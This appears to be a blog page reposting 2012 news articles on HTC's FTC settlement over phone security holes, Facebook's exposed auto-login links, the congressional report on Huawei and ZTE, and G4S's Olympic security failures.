That requires a user, when installing an application that is not a standard part of the operating system, to be notified and to agree that the application could gain access to certain information or functions.

HTC, however, preinstalled certain apps on its phones in a way that, in addition to preventing consumers from removing them, disabled the permission-based model and allowed newly installed apps to have immediate access to personal data.

“The analogy isn’t exact,” wrote Ms. Fair of the F.T.C., “but it’s like giving a friend the combination to a safe only to find out he’s handing it over to anyone who asks.”

That security hole could, for example, let the rogue software secretly record users’ phone conversations or track their location.

Flaws in the security system could also give third-party apps access to phone numbers, contents of text messages, browsing history and information like credit card numbers and banking transactions. Those flaws also affected HTC phones that used Windows-based operating systems.

While HTC’s actions introduced numerous security vulnerabilities to its phones, a commission official said it was not clear how many users experienced illegal incursions into their phones and personal information.

The flaw in the company’s phones has been known since at least 2011. HTC acknowledged the problems at that time and developed software patches for at least some of the deficiencies that year.

But the problems were far from minor. The F.T.C. said that text-message toll fraud, in which a hacker causes a phone to send text messages to a number that charges the user for delivery of the message, “is one of the most common types of Android malware,” or malicious software.

HTC’s user manuals either said or implied that a user was protected against malware because of the permission-based security, the commission said.

The commission will collect public comments on the proposed remedies for 30 days, after which it will decide whether to formally carry out the order. If HTC subsequently violates the order’s restrictions and requirements, it faces civil penalties of up to $16,000 a violation.

Sunday, November 18, 2012

Facebook Cancels Shortcut Over Concern for Security

SAN FRANCISCO — What was supposed to be a shortcut for Facebook users to log into their pages ended up exposing their e-mail addresses — and, in some cases, potentially allowing access to their accounts as well.

A Facebook spokesman said on Friday that the company had created the shortcut, called auto login, to let some users go directly to their pages by clicking on a Web link sent to their e-mail addresses. Once they clicked on the link, they could get into their accounts, rather than having to go to Facebook.com and log in.

Some of the links required users to type their passwords, while others did not, the company said.

On the Web site Hacker News, a technology discussion board, Matt Jones, an engineer at Facebook, said the company had offered the service for “ease of use” and never made the Web addresses “publicly available.”

But they did become publicly available, as the discussion on Hacker News revealed on Friday.

The Facebook spokesman, Frederic Wolens, said some users may have posted the links on the Web, allowing anyone to search for them. Those links could give a stranger access to the Facebook pages connected to them, as well as the e-mail addresses of those users. Mr. Wolens said he had no explanation why someone would post the links.  

When Facebook found the problem, it discontinued the shortcut.

The Hacker News thread said over one million Facebook accounts had been affected. Facebook could not confirm that figure on Friday afternoon.

TrendMicro, a private security company that offers safety tools for Facebook users, said Web address shortcuts were inherently dangerous because they could ultimately end up on the Web.

“Many, many hackers are targeting these portals because of the ubiquitous trust and use of them,” said Tom Kellermann, vice president for cybersecurity at TrendMicro. He added, “You don’t take shortcuts through the woods in cyberspace.”

The news of the security hole comes a week after a Bulgarian blogger, Bogomil Shopov, said he had bought 1.1 million Facebook users’ names and e-mail addresses on the Web for $5. He found the information for sale on a marketplace site, gigbucks.com. The items are no longer available.

Mr. Wolens of Facebook said the data had been acquired and compiled by someone who took whatever information Facebook users made public on their pages — and from other publicly available data about those users.

Mr. Kellermann of TrendMicro said the problem with the shortcut could explain how the names and e-mail addresses that Mr. Shopov had found became public. Facebook said the security flaw and the user data for sale had nothing to do with each another.

“We have no reason whatsoever to believe that these two incidents are related,” Mr. Wolens said.

Thursday, October 11, 2012

U.S. Panel Calls Huawei and ZTE ‘National Security Threat’

The House Intelligence Committee said that after a yearlong investigation it had come to the conclusion that the Chinese businesses, Huawei Technologies and ZTE Inc., were a national security threat because of their attempts to extract sensitive information from American companies and their loyalties to the Chinese government.

The companies sell telecommunications equipment needed to create and operate wireless networks, like the ones used by Verizon Wireless and AT&T. Many of the major suppliers of the equipment are based outside the United States, creating concerns here about the security of communications.

Those concerns are most acute about Huawei and ZTE because of their close ties to the Chinese government, which the committee said has heavily subsidized the companies. Allowing the Chinese companies to do business in the United States, the report said, would give the Chinese government the ability to easily intercept communications and could allow it to start online attacks on critical infrastructure, like dams and power grids.

The release of the report comes as both presidential candidates have spoken of the importance of United States ties with China and have promised to act strongly on Chinese currency and trade practices that are damaging to American business interests.

Mitt Romney, the Republican presidential candidate, has called repeatedly during his campaign for a more confrontational approach to China on business issues, although he has focused his warnings more on Chinese currency market interventions than on the activities of the nation’s telecommunications companies.

President Obama has also taken a tougher stance on China recently. Late last month, Mr. Obama, through the Committee on Foreign Investment, ordered a Chinese company to divest itself of interests in four wind farm projects near a Navy base in Oregon where drone aircraft training takes place. It was the first time a president had blocked such a deal in 22 years.

The Obama administration has also filed a case at the World Trade Organization in Geneva accusing China of unfairly subsidizing its exports of autos and auto parts, the ninth trade action the administration has brought against China.

“We have a process that is not aimed at one specific company but using all the assets and parts of U.S. government aimed at protecting our telecommunications and critical infrastructure,” a senior White House official said.

The report was released on Monday morning at a news conference held by

Representative Mike Rogers, Republican of Michigan, the chairman of the House Intelligence Committee, and Representative C. A. Ruppersberger of Maryland, the top Democrat on the committee.

They said that the United States government should be barred from doing business with Huawei and ZTE and that American companies should avoid buying their equipment.

The report said the committee had obtained internal documents from former employees of Huawei that showed it supplied services to a “cyberwarfare” unit in the People’s Liberation Army.

The United States government, the report said, should go through the Committee on Foreign Investment in the United States, an interagency panel that reviews the national security implications of foreign investments, to carry out its recommendations. It also said that committee should block any mergers and acquisitions involving the Chinese companies and American businesses.

In the course of the investigation, the House committee said it had uncovered evidence of economic espionage — and officials said on Monday that they planned to hand over the evidence to the F.B.I.

Former and current employees for Huawei, the report said, told investigators for the committee that the company had committed “potential violations” in the United States related to immigration, bribery, corruption and copyright infringement.

Huawei has been the focus of criticism and security warnings for years, including by the Defense Department. Its expansion plans in the United States have faced resistance from Congress over questions about its ties to the military in China.

Huawei denies being financed to undertake research and development for the Chinese military, and its executives have repeatedly insisted that they have nothing to hide. The company issued an open letter to the United States government in February 2011, asking for an inquiry to clear up what it characterized as misperceptions about its history and business operations.

Michael S. Schmidt reported from Washington and Christine Hauser from New York. Keith Bradsher contributed reporting from Hong Kong, and Quentin Hardy from San Francisco.

Tuesday, October 9, 2012

The State of Social Security Disability On Sunday's American Law Journal

No doubt, there's fraud in the disability system — and it's a big issue when governments are running deficits. But really how much?

Saturday, September 29, 2012

After London Olympics Debacle, Security Firm Shuffles Top Managers

In a statement after an internal investigation, the company, G4S, said David Taylor-Smith, the chief operating 0fficer and Ian Horseman Sewell, the managing director global events, had resigned. But the chief executive, Nick Buckles, who acknowledged his company’s shortcomings to a parliamentary panel before the summer games, kept his job.

John Connolly, the newly appointed chairman of the company, declared: “G4S has accepted responsibility for its failure to deliver fully on the Olympic contract. We apologize for this and we thank the military and the police for the vital roles they played in ensuring the delivery of a safe and secure games.”

In July, before the games started, lawmakers grilled Mr. Buckles about his company’s failure to meet contractual obligations to provide a guaranteed security staff of 10,400 and he acknowledged that his company’s performance had been a ”humiliating shambles.”

Nicola Blackwood, a Conservative legislator on Parliament’s Home Affairs select committee, said at the time, “’I had very little confidence in G4S fulfilling this contract before this session started and now I don’t have any confidence at all.”

In the event, the games passed off without notable security scares as the British authorities ringed the Olympic site in east London with a deterrent force including warplanes and ground-to-air missiles, separately from troops who supplemented GS4 staff and police in routine security procedures.

In the statement on Friday, the company, one of the world’s biggest security providers, said the “Olympic contract was unique in terms of scale and complexity, but notwithstanding this, the company was capable of fulfilling the contract; the issue was in its delivery.”

“Although the company recognized the unique and complex nature of the Olympic contract from an early stage, this was not properly reflected in its handling of the contract,” the statement said.

“The monitoring and tracking of the security workforce, management information and the project management framework and practices were ineffective to address the scale, complexities and dependencies of the Olympic contract,” the statement continued. “Together this caused the failure of the company to deliver the contract requirements in full and resulted in the identification of the key problems at a very late stage.”

Despite the departure of two senior managers and a reorganization of some other management posts, the statement said it was “in the best interests of the company and of all its stakeholders that Nick Buckles should remain” chief executive since a company investigation “did not identify significant shortcomings in his performance or serious failings attributable to him in connection with the Olympic contract.”

Mr. Buckles has been chief executive since 2005 and has overseen growth at the company reflected in a soaring share price. But the Olympics debacle threatened the company’s relationship with the British government, one of its main customers, at a time when the authorities are looking increasingly to outsource work, including prison management and other contracts.